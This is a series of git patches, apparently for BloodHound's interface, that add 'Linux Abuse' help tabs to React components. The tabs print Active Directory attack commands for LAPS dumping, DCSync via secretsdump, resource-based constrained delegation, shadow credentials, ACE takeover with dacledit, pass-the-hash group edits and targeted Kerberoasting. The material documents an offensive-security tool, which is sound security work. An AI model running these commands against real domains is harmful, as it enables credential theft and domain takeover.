+                            ms-Mcs-AdmPwd. With full control of the computer
+                            object, you may have the ability to read this
+                            attribute, or grant yourself the ability to read the
+                            attribute by modifying the computer object's
+                            security descriptor.
+                        </p>
+
+                        <p>
+                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                             to retrieve LAPS passwords:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                }
+                            </code>
+                        </pre>
+
+                        <h4> Resource-Based Constrained Delegation </h4>
+
+                        <p>
+                            First, if an attacker does not control an account with an
+                            SPN set, a new attacker-controlled computer account can be
+                            added with Impacket's addcomputer.py example script:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            We can then get a service ticket for the service name (sname) we
+                            want to "pretend" to be "admin" for. Impacket's getST.py example script
+                            can be used for that purpose.
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            This ticket can then be used with Pass-the-Ticket, and could grant access
+                            to the file system of the TARGETCOMPUTER.
+                        </p>
+
+                        <h4> Shadow Credentials attack </h4>
+
+                        <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                        <pre>
+                            <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                        </pre>
+
+                        <p>
+                            For other optional parameters, view the pyWhisker documentation.
+                        </p>
+                    </>
+                );
+            } else {
+                return (
+                    <>
+                        <h4> Resource-Based Constrained Delegation </h4>
+
+                        <p>
+                            First, if an attacker does not control an account with an
+                            SPN set, a new attacker-controlled computer account can be
+                            added with Impacket's addcomputer.py example script:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            We can then get a service ticket for the service name (sname) we
+                            want to "pretend" to be "admin" for. Impacket's getST.py example script
+                            can be used for that purpose.
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            This ticket can then be used with Pass-the-Ticket, and could grant access
+                            to the file system of the TARGETCOMPUTER.
+                        </p>
+
+                        <h4> Shadow Credentials attack </h4>
+
+                        <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                        <pre>
+                            <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                        </pre>
+
+                        <p>
+                            For other optional parameters, view the pyWhisker documentation.
+                        </p>
+                    </>
+                );
+            }
+        case 'Domain':
+            return (
+                <>
+                    <h4> DCSync </h4>
+
+                    <p>
+                        The AllExtendedRights privilege grants {sourceName} both the
+                        DS-Replication-Get-Changes and
+                        DS-Replication-Get-Changes-All privileges, which combined
+                        allow a principal to replicate objects from the domain{' '}
+                        {targetName}.
+                    </p>
+
+                    <p>
+                        This can be abused using Impacket's secretsdump.py example script:
+                    </p>
+
+                    <pre>
+                            <code>
+                                {
+                                    "secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"
+                                }
+                            </code>
+                    </pre>
+
+                    <h4> Retrieve LAPS Passwords </h4>
+
+                    <p>
+                        The AllExtendedRights privilege also grants {sourceName} enough{' '}
+                        privileges, to retrieve LAPS passwords domain-wise.
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                         for that purpose:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+        case 'GPO':
+            return (
+                <>
+                    <p>
+                        With full control of a GPO, you may make modifications
+                        to that GPO which will then apply to the users and
+                        computers affected by the GPO. Select the target object
+                        you wish to push an evil policy down to, then use the
+                        gpedit GUI to modify the GPO, using an evil policy that
+                        allows item-level targeting, such as a new immediate
+                        scheduled task. Then wait at least 2 hours for the group
+                        policy client to pick up and execute the new evil
+                        policy. See the references tab for a more detailed write
+                        up on this abuse`;
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/Hackndo/pyGPOAbuse">pyGPOAbuse.py</a> can be used for that purpose.
+                    </p>
+                </>
+            );
+        case 'OU':
+            return (
+                <>
+                    <h4>Control of the Organization Unit</h4>
+
+                    <p>
+                        With full control of the OU, you may add a new ACE on
+                        the OU that will inherit down to the objects under that
+                        OU. Below are two options depending on how targeted you
+                        choose to be in this step:
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+        case 'OU':
+            return (
+                <>
+                    <h4>Control of the Organization Unit</h4>
+
+                    <p>
+                        With full control of the OU, you may add a new ACE on
+                        the OU that will inherit down to the objects under that
+                        OU. Below are two options depending on how targeted you
+                        choose to be in this step:
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+        case 'Container':
+            return (
+                <>
+                    <h4>Control of the Container</h4>
+
+                    <p>
+                        With full control of the container, you may add a new ACE on
+                        the container that will inherit down to the objects under that
+                        OU. Below are two options depending on how targeted you
+                        choose to be in this step:
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'containerDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+    }
+    return <></>;
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+    targetName: PropTypes.string,
+    targetType: PropTypes.string,
+    targetId: PropTypes.string,
+    haslaps: PropTypes.bool,
+};
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/GenericAll/References.jsx b/src/components/Modals/HelpTexts/GenericAll/References.jsx
index 6746e9f68..71b344393 100644
--- a/src/components/Modals/HelpTexts/GenericAll/References.jsx
+++ b/src/components/Modals/HelpTexts/GenericAll/References.jsx
@@ -46,6 +46,38 @@ const References = () => {
             <a href='https://github.com/Kevin-Robertson/Powermad#new-machineaccount'>
                 https://github.com/Kevin-Robertson/Powermad#new-machineaccount
             </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/addmember'>
+                https://www.thehacker.recipes/ad/movement/dacl/addmember
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting'>
+                https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/group-policies'>
+                https://www.thehacker.recipes/ad/movement/group-policies
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword'>
+                https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials'>
+                https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync'>
+                https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'>
+                https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/grant-rights'>
+                https://www.thehacker.recipes/ad/movement/dacl/grant-rights
+            </a>
         </>
     );
 };
diff --git a/src/components/Modals/HelpTexts/GenericAll/Abuse.jsx b/src/components/Modals/HelpTexts/GenericAll/WindowsAbuse.jsx
similarity index 99%
rename from src/components/Modals/HelpTexts/GenericAll/Abuse.jsx
rename to src/components/Modals/HelpTexts/GenericAll/WindowsAbuse.jsx
index 8eb15396d..b6f463252 100644
--- a/src/components/Modals/HelpTexts/GenericAll/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/GenericAll/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({
+const WindowsAbuse = ({
     sourceName,
     sourceType,
     targetName,
@@ -592,7 +592,7 @@ const Abuse = ({
     return <></>;
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
     targetName: PropTypes.string,
@@ -600,4 +600,4 @@ Abuse.propTypes = {
     targetId: PropTypes.string,
     haslaps: PropTypes.bool,
 };
-export default Abuse;
+export default WindowsAbuse;

From 23b090d8df26c2e93e0fa13441ace318561dab4d Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 17:37:27 +0100
Subject: [PATCH 14/32] Adding headers for AllExtendedRights linux abuse

---
 .../Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx         | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx
index 18465a52c..b00ff156a 100644
--- a/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx
@@ -80,6 +80,8 @@ const LinuxAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps })
         case 'Domain':
             return (
                 <>
+                    <h4> DCSync </h4>
+
                     <p>
                         The AllExtendedRights privilege grants {sourceName} both the
                         DS-Replication-Get-Changes and
@@ -100,6 +102,8 @@ const LinuxAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps })
                             </code>
                     </pre>
 
+                    <h4> Retrieve LAPS Passwords </h4>
+
                     <p>
                         The AllExtendedRights privilege also grants {sourceName} enough{' '}
                         privileges, to retrieve LAPS passwords domain-wise.

From 34327bcb61d1d8ccbc8c5fb42059ae86cb5d3813 Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 17:46:19 +0100
Subject: [PATCH 15/32] GenericWrite Linux abuse

---
 .../HelpTexts/GenericWrite/GenericWrite.jsx   |  18 +-
 .../HelpTexts/GenericWrite/LinuxAbuse.jsx     | 177 ++++++++++++++++++
 .../{Abuse.jsx => WindowsAbuse.jsx}           |   6 +-
 3 files changed, 193 insertions(+), 8 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/GenericWrite/{Abuse.jsx => WindowsAbuse.jsx} (98%)

diff --git a/src/components/Modals/HelpTexts/GenericWrite/GenericWrite.jsx b/src/components/Modals/HelpTexts/GenericWrite/GenericWrite.jsx
index fb3828e80..0e8cb678b 100644
--- a/src/components/Modals/HelpTexts/GenericWrite/GenericWrite.jsx
+++ b/src/components/Modals/HelpTexts/GenericWrite/GenericWrite.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -17,17 +18,24 @@ const GenericWrite = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse
                     sourceName={sourceName}
                     sourceType={sourceType}
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse
+                    sourceName={sourceName}
+                    sourceType={sourceType}
+                    targetType={targetType}
+                />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>
diff --git a/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx
new file mode 100644
index 000000000..de7650592
--- /dev/null
+++ b/src/components/Modals/HelpTexts/GenericWrite/LinuxAbuse.jsx
@@ -0,0 +1,177 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({ sourceName, sourceType, targetType }) => {
+    switch (targetType) {
+        case 'Group':
+            return (
+                <>
+                    <p>
+                        GenericWrite to a group allows you to directly modify
+                        group membership of the group.
+                    </p>
+
+                    <p>
+                        Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Finally, verify that the user was successfully added to the group:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+        case 'User':
+            return (
+                <>
+                    <h4> Targeted Kerberoast </h4>
+
+                    <p>
+                        A targeted kerberoast attack can be performed using{' '}
+                        <a href='https://github.com/ShutdownRepo/targetedKerberoast'>targetedKerberoast.py</a>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        The tool will automatically attempt a targetedKerberoast
+                        attack, either on all users or against a specific one if
+                        specified in the command line, and then obtain a crackable hash.
+                        The cleanup is done automatically as well.
+                    </p>
+
+                    <p>
+                        The recovered hash can be cracked offline using the tool
+                        of your choice.
+                    </p>
+
+                    <h4> Shadow Credentials attack </h4>
+
+                    <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                    <pre>
+                        <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                    </pre>
+
+                    <p>
+                        For other optional parameters, view the pyWhisker documentation.
+                    </p>
+                </>
+            );
+        case 'Computer':
+            return (
+                <>
+                    <h4> Resource-Based Constrained Delegation </h4>
+
+                    <p>
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        We can then get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
+                    </p>
+
+                    <h4> Shadow Credentials attack </h4>
+
+                    <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                    <pre>
+                        <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                    </pre>
+
+                    <p>
+                        For other optional parameters, view the pyWhisker documentation.
+                    </p>
+                </>
+            );
+        case 'GPO':
+            return (
+                <>
+                    <p>
+                        With GenericWrite over a GPO, you may make modifications
+                        to that GPO which will then apply to the users and
+                        computers affected by the GPO. Select the target object
+                        you wish to push an evil policy down to, then use the
+                        gpedit GUI to modify the GPO, using an evil policy that
+                        allows item-level targeting, such as a new immediate
+                        scheduled task. Then wait at least 2 hours for the group
+                        policy client to pick up and execute the new evil
+                        policy. See the references tab for a more detailed write
+                        up on this abuse`;
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/Hackndo/pyGPOAbuse">pyGPOAbuse.py</a> can be used for that purpose.
+                    </p>
+                </>
+            );
+    }
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+    targetType: PropTypes.string,
+};
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/GenericWrite/Abuse.jsx b/src/components/Modals/HelpTexts/GenericWrite/WindowsAbuse.jsx
similarity index 98%
rename from src/components/Modals/HelpTexts/GenericWrite/Abuse.jsx
rename to src/components/Modals/HelpTexts/GenericWrite/WindowsAbuse.jsx
index 5fab21f58..aa45155d5 100644
--- a/src/components/Modals/HelpTexts/GenericWrite/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/GenericWrite/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({ sourceName, sourceType, targetType }) => {
+const WindowsAbuse = ({ sourceName, sourceType, targetType }) => {
     switch (targetType) {
         case 'Group':
             return (
@@ -213,10 +213,10 @@ const Abuse = ({ sourceName, sourceType, targetType }) => {
     }
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
     targetType: PropTypes.string,
 };
 
-export default Abuse;
+export default WindowsAbuse;

From 91e2186d34d6ca7f346bd67fbe5351bc7de22cfc Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 17:48:43 +0100
Subject: [PATCH 16/32] Fixing indentation

---
 src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx
index 07137601a..0d0855642 100644
--- a/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/DCSync/LinuxAbuse.jsx
@@ -9,11 +9,11 @@ const LinuxAbuse = () => {
             </p>
 
             <pre>
-                    <code>
-                        {
-                            "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
-                        }
-                    </code>
+                <code>
+                    {
+                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                    }
+                </code>
             </pre>
 
             <p>

From 59c534c10e893516fa28edfa24255efb2c5baf27 Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 17:48:55 +0100
Subject: [PATCH 17/32] GetChanges Linux abuse

---
 .../HelpTexts/GetChanges/GetChanges.jsx       | 14 ++++++----
 .../HelpTexts/GetChanges/LinuxAbuse.jsx       | 28 +++++++++++++++++++
 .../{Abuse.jsx => WindowsAbuse.jsx}           |  4 +--
 3 files changed, 39 insertions(+), 7 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/GetChanges/{Abuse.jsx => WindowsAbuse.jsx} (92%)

diff --git a/src/components/Modals/HelpTexts/GetChanges/GetChanges.jsx b/src/components/Modals/HelpTexts/GetChanges/GetChanges.jsx
index 49a55067e..1571e0bbb 100644
--- a/src/components/Modals/HelpTexts/GetChanges/GetChanges.jsx
+++ b/src/components/Modals/HelpTexts/GetChanges/GetChanges.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -16,13 +17,16 @@ const GetChanges = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>
diff --git a/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx
new file mode 100644
index 000000000..0d0855642
--- /dev/null
+++ b/src/components/Modals/HelpTexts/GetChanges/LinuxAbuse.jsx
@@ -0,0 +1,28 @@
+import React from 'react';
+
+const LinuxAbuse = () => {
+    return (
+        <>
+            <p>
+                You may perform a dcsync attack to get the password hash of an
+                arbitrary principal using impacket's secretsdump.py example script:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                    }
+                </code>
+            </pre>
+
+            <p>
+                You can also perform the more complicated ExtraSids attack to
+                hop domain trusts. For information on this see the blog post by
+                harmj0y in the references tab.
+            </p>
+        </>
+    );
+};
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/GetChanges/Abuse.jsx b/src/components/Modals/HelpTexts/GetChanges/WindowsAbuse.jsx
similarity index 92%
rename from src/components/Modals/HelpTexts/GetChanges/Abuse.jsx
rename to src/components/Modals/HelpTexts/GetChanges/WindowsAbuse.jsx
index 3d2c26540..6cba4a61b 100644
--- a/src/components/Modals/HelpTexts/GetChanges/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/GetChanges/WindowsAbuse.jsx
@@ -1,6 +1,6 @@
 import React from 'react';
 
-const Abuse = () => {
+const WindowsAbuse = () => {
     return (
         <>
             <p>
@@ -24,4 +24,4 @@ const Abuse = () => {
     );
 };
 
-export default Abuse;
+export default WindowsAbuse;

From 361b4eb63b8ccd921fe7c6a85367b1ec6b1b74d7 Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 17:54:37 +0100
Subject: [PATCH 18/32] GetChangesAll Linux abuse

---
 .../HelpTexts/GetChangesAll/GetChangesAll.jsx | 14 ++++++----
 .../HelpTexts/GetChangesAll/LinuxAbuse.jsx    | 28 +++++++++++++++++++
 .../{Abuse.jsx => WindowsAbuse.jsx}           |  6 ++--
 3 files changed, 40 insertions(+), 8 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/GetChangesAll/{Abuse.jsx => WindowsAbuse.jsx} (91%)

diff --git a/src/components/Modals/HelpTexts/GetChangesAll/GetChangesAll.jsx b/src/components/Modals/HelpTexts/GetChangesAll/GetChangesAll.jsx
index 7db38ad6e..f280de03e 100644
--- a/src/components/Modals/HelpTexts/GetChangesAll/GetChangesAll.jsx
+++ b/src/components/Modals/HelpTexts/GetChangesAll/GetChangesAll.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -16,13 +17,16 @@ const GetChangesAll = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetName={targetName}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse />
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>
diff --git a/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx
new file mode 100644
index 000000000..0d0855642
--- /dev/null
+++ b/src/components/Modals/HelpTexts/GetChangesAll/LinuxAbuse.jsx
@@ -0,0 +1,28 @@
+import React from 'react';
+
+const LinuxAbuse = () => {
+    return (
+        <>
+            <p>
+                You may perform a dcsync attack to get the password hash of an
+                arbitrary principal using impacket's secretsdump.py example script:
+            </p>
+
+            <pre>
+                <code>
+                    {
+                        "secretsdump 'testlab.local'/'Administrator':'Password'@'DOMAINCONTROLLER'"
+                    }
+                </code>
+            </pre>
+
+            <p>
+                You can also perform the more complicated ExtraSids attack to
+                hop domain trusts. For information on this see the blog post by
+                harmj0y in the references tab.
+            </p>
+        </>
+    );
+};
+
+export default LinuxAbuse;
diff --git a/src/components/Modals/HelpTexts/GetChangesAll/Abuse.jsx b/src/components/Modals/HelpTexts/GetChangesAll/WindowsAbuse.jsx
similarity index 91%
rename from src/components/Modals/HelpTexts/GetChangesAll/Abuse.jsx
rename to src/components/Modals/HelpTexts/GetChangesAll/WindowsAbuse.jsx
index c00eda93f..6cba4a61b 100644
--- a/src/components/Modals/HelpTexts/GetChangesAll/Abuse.jsx
+++ b/src/components/Modals/HelpTexts/GetChangesAll/WindowsAbuse.jsx
@@ -1,6 +1,6 @@
 import React from 'react';
 
-const Abuse = () => {
+const WindowsAbuse = () => {
     return (
         <>
             <p>
@@ -17,11 +17,11 @@ const Abuse = () => {
             </pre>
             <p>
                 You can also perform the more complicated ExtraSids attack to
-                hop domain trusts. For information on this see the blod post by
+                hop domain trusts. For information on this see the blog post by
                 harmj0y in the references tab.
             </p>
         </>
     );
 };
 
-export default Abuse;
+export default WindowsAbuse;

From 21dd4b9d78c2eddcffe228726804c1abd9542034 Mon Sep 17 00:00:00 2001
From: Shutdown <nwodtuhs+github@pm.me>
Date: Mon, 19 Dec 2022 18:12:52 +0100
